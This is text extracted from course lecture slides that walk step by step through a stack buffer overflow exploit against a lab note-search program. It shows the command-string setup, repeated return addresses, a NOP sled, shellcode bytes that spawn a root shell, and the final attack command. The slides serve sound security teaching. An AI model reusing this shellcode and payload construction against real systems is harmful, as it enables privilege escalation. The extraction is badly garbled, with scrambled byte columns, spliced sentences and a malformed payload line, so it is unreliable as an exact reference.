Lesson 10 Buffer Overflow Demo

advertisement
Buffer Overflow Walk-Through
The Code
Change name of notesearch program in our exploit
code to match course naming convention
bettersearchnote.exe
16
strcpy(command, “./bettersearchnote.exe\’”);
Change name of notesearch program in our exploit
code to match course name in convention
Normally, Jose runs bettersearchnote program to
search for notes with keywords of his choosing
jose@EC310-VM $ ./ bettersearchnote.exe “Life”
Life is Beautiful
The exploit program is crafted to run the program
on his behalf, using the function “system()”
For example system(“ls”) would
list the content of the current
directory as though it was run
from the command line
jose@EC310-VM $ ls
unix_basics booksrc work desktop ec310code
}
like this except no one ever enters
this at the command prompt
The exploit program is crafted to run the program
on his behalf, using the function “system()”
system_example.c
#include…
int main() {
system(“ls”);
}
jose@EC310-VM $ ./system_example.exe
unix_basics booksrc work desktop ec310code
Now, lets look at what the exploit program does…
Standard inclusion
of C libraries
The goal of our exploit program is to open a root shell
This is machine
language that opens a
shell prompt for the
user running the
program
First, the set-up…
This is the standard way
to start a program and
take in command line
arguments… But you
already knew that
Building the stack…
These lines declare
the variables to be
used in the
program
buffer
command
Variables are
placed on the
stack for the main
function
offset
ret
ptr
i
270
Address
Address
Integer
Integer
Address
Integer
Allocating memory on the heap for our string command,
which will be called by the function system() .
Allocates 200 bytes on
the heap for the string
command
0x__
200
Bytes
The address of this
location on the heap
becomes the value
of the pointer
command
This string will
eventually be run
with the function
system()
buffer
command
offset
ret
ptr
i
&command
270
Allocating memory on the heap for our string
command, which will be called by the function
system().
The bzero function places
200 0x00’s starting at the
location to which
command points
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
buffer
command
offset
ret
ptr
i
&command
270
200
Bytes
Building the String command
This copies the string
“./bettersearchnote.exe ‘“
into the location pointed
to by the pointer
command
00
.
00
t
00
s
00
c
00
t
00
x
00
00
00
/
00
t
00
e
00
h
00
e
00
e
00
00
buffer
command
offset
ret
ptr
i
00
b
00
e
00
a
00
n
00
.
00
00
00
00
e
00
r
00
r
00
o
00
e
00
‘
00
00
&command
270
Next
This we
string
need
willtoeventually
find the address
overflow
where
the bettersearchnote
the command linebuffer,
arguments
have the
for
program execute
bettersearchnote
our maliciouswill
code,
start!
and open a shell
Take the number of bytes
in the current string
command, until the null
terminator (24 bytes).
Add this to the address
pointed to by the variable
command
+
and store that address in
the pointer buffer.
.
t
s
c
t
x
00
00
/
t
e
h
e
e
00
00
b
e
a
n
.
00
00
e
r
r
o
e
‘
00
00
buffer
command
&command
offset
270
ret
ptr
i
24
Bytes
Specifying our custom return address
.
t
s
c
t
x
00
00
This takes the command line
argument to create our own
custom offset value, but it is
not used.
/
t
e
h
e
e
00
00
b
e
a
n
.
00
00
e
r
r
o
e
‘
00
00
buffer
&command+24
command
&command
offset
270
ret
ptr
i
Specifying our custom return address
This takes the address of i
and subtracts the value of offset.
This value is placed in the
variable ret , this value represents
the address of our desired shell
code execution entry point.
.
t
s
c
t
x
00
00
/
t
e
h
e
e
00
00
b
e
a
n
.
00
00
e
r
r
o
e
‘
00
00
buffer
&command+24
command
&command
offset
270
- 270
ret
ptr
&i
i
And place enough copies of our custom return address in
the buffer to overwrite the original return address.
Takes the address contained in
ret and places it in the address
pointed to by the buffer. This
repeats every 4 bytes for
40 iterations.
.
t
s
c
t
x
00
00
00
/
t
e
h
e
e
00
00
00
b
e
a
n
.
.
00
00
00
e
r
r
o
e
‘
00
00
00
buffer
&command+24
command
offset
ret
ptr
&command
270
&i &i-270
- 270
i
Now the entire heap looks like
this
.
t
s
c
t
x
0x00
0x00
0x00
0x00
/
t
e
h
e
e
b
e
a
n
.
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
0x00
0x00
0x00
0x00
0x00
0x00
0x00
0x00
e
r
r
o
e
'
0x00
0x00
0x00
0x00
Next create a buffer of filler commands, called NOPs, to
help find the shell code
.
t
s
c
t
x
/
b
e
t
e
r
e
a
r
h
n
o
e
.
e
e
.
‘
&I - 270
&I - 270
&i - 270
ret 0x I – addr - 270
&i - 270
&i - 270
&i - 270
&i - 270
&i - 270
memset() sets a byte in
memory to the value
0x90
specified.
In this case it puts the value
0x90 in the address pointed
to by the buffer and into the
next 59 addresses as well.
0x90 is machine code for
“No Operation,” Which
literally means do nothing.
buffer
&command+24
command
&command
offset
270
ret
ptr
i
&i-270
Now the entire heap looks like
this
NOP sled
.
t
s
c
t
x
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
/
t
e
h
e
e
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
b
e
a
n
.
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
e
r
r
o
e
'
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x00
0x00
0x00
0x00
0x00
0x00
0x00
0x00
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
0x00
0x00
0x00
0x00
0x00
0x00
0x00
0x00
Then place our shell code into the buffer immediately following the NOPs
.
/
b
e
t
t
e
r
s
e
a
r
c
h
n
o
t
e
.
e
x
e
.
‘
0x90 0x90 0x90 0x90
0x90 0x90 0x90 0x90
0x90 0x90 0x90 0x90
ret 0x I – addr - 270
ret 0x I – addr - 270
ret 0x I – addr - 270
ret 0x I – addr - 270
ret 0x I – addr - 270
ret 0x I – addr - 270
Copies the shell code into
memory after the NOP sled
buffer
&command+24
command
&command
offset
270
ret
ptr
i
&i-270
Now the entire heap looks like this
With the newly inserted shell
code here
.
t
s
c
t
x
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x31
0x99
0x80
0x51
0x2f
0x2f
0x89
0xe2
0xcd
/
t
e
h
e
e
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0xc0
0xb0
0x6a
0x51
0x73
0x62
0xe3
0x53
0x80
b
e
a
n
.
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x31
0xa4
0x0b
0x68
0x68
0x69
0x51
0x89
0x80
e
r
r
o
e
'
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0xc9
0xcd
0x58
0x2f
0x68
0x6e
0x89
0xe1
partial ret
0x00
0x00
0x00
0x00
0x00
0x00
0x00
0x00
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
0x00
0x00
0x00
0x00
0x00
0x00
0x00
0x00
Close the string command with a quote so it is ready to
be run by the function system()
‘
.
t
s
c
t
x
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x31
0x99
0x80
0x51
0x2f
0x2f
0x89
0xe2
0xcd
//
tt
ee
hh
ee
ee
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0xc0
0xc0
0xb0
0xb0
0x6a
0x6a
0x51
0x51
0x73
0x73
0x62
0x62
0xe3
0xe3
0x53
0x53
0x80
0x80
bb
ee
aa
nn
..
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x31
0x31
0xa4
0xa4
0x0b
0x0b
0x68
0x68
0x68
0x68
0x69
0x69
0x51
0x51
0x89
0x89
0x80
0x80
ee
rr
rr
oo
ee
''
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0xc9
0xc9
0xcd
0xcd
0x58
0x58
0x2f
0x2f
0x68
0x68
0x6e
0x6e
0x89
0x89
0xe1
0xe1
partial
partialret
ret
0x00
0x00
0x00
0x00
0x00
0x00
0x00
0x00
0x00
0x00
0x00
0x00
0x00
0x00
0x00
0x00
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
Concatenates a single quote at
the end of the string
command
'
0x00
0x00
0x00
0x00
0x00
0x00
0x00
0x00
0x00
0x00
0x00
0x00
Now the string command is finished and ready for
execution.
jose@EC310-VM $ ./bettersearchnote.exe
‘\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x9
0\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x9
0\x90\x90\x90\x90\x90\x90\x31\xc0\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x51\x68\x2f\x2f\x73\x68\x68\x2f
\x62\x69\x6e\x89\xe2\x53\x89\xe2\x53\x89\xe1\xcd\x80\x80\x&i-270\x&i-270 \x&i-270\ x&i-270\ x&i-270\ x&i-270 \
x&i-270 \ x&i-270 \x&i-270 \x&i-270 \x&i-270 \x&i-270 \x&i-270 \x&i-270 \x&i-270 \x&i-270 \x&i-270 ’
.
t
s
c
t
x
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x31
0x99
0x80
0x51
0x2f
0x2f
0x89
0xe2
0xcd
/
t
e
h
e
e
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0xc0
0xb0
0x6a
0x51
0x73
0x62
0xe3
0x53
0x80
b
e
a
n
.
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x31
0xa4
0x0b
0x68
0x68
0x69
0x51
0x89
0x80
e
r
r
o
e
'
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0xc9
0xcd
0x58
0x2f
0x68
0x6e
0x89
0xe1
partial ret
0x00
0x00
0x00
0x00
0x00
0x00
0x00
0x00
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
‘
0x00
0x00
0x00
0x00
0x00
0x00
0x00
exploit_notesearch
bettersearchnote.exe
searchstring
fd
printing
user id
sfp
return address
100 characters allotted
to searchstring by
bettersearchnote.exe
exploit_notesearch
command buffer
contains 184 bytes, so it
writes 84 bytes beyond
the end of searchstring’s
allotted space.
Ensuring one of our
custom return addresses
replaces the original
return address
..
tt
ss
cc
tt
xx
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x31
0x31
0x99
0x99
0x80
0x80
0x51
0x51
0x2f
0x2f
0x2f
0x2f
0x89
0x89
0xe2
0xe2
0xcd
0xcd
//
tt
ee
hh
ee
ee
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0xc0
0xc0
0xb0
0xb0
0x6a
0x6a
0x51
0x51
0x73
0x73
0x62
0x62
0xe3
0xe3
0x53
0x53
0x80
0x80
bb
ee
aa
nn
..
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x31
0x31
0xa4
0xa4
0x0b
0x0b
0x68
0x68
0x68
0x68
0x69
0x69
0x51
0x51
0x89
0x89
0x80
0x80
ee
rr
rr
oo
ee
''
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0x90
0xc9
0xc9
0xcd
0xcd
0x58
0x58
0x2f
0x2f
0x68
0x68
0x6e
0x6e
0x89
0x89
0xe1
0xe1
partial
partial ret
ret
0x00
0x00
0x00
0x00
0x00
0x00
0x00
0x00
0x00
0x00
0x00
0x00
0x00
0x00
0x00
0x00
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
&i-270
‘‘
0x00
0x00
0x00
0x00
0x00
0x00
0x00
0x00
0x00
0x00
0x00
0x00
0x00
0x00
Download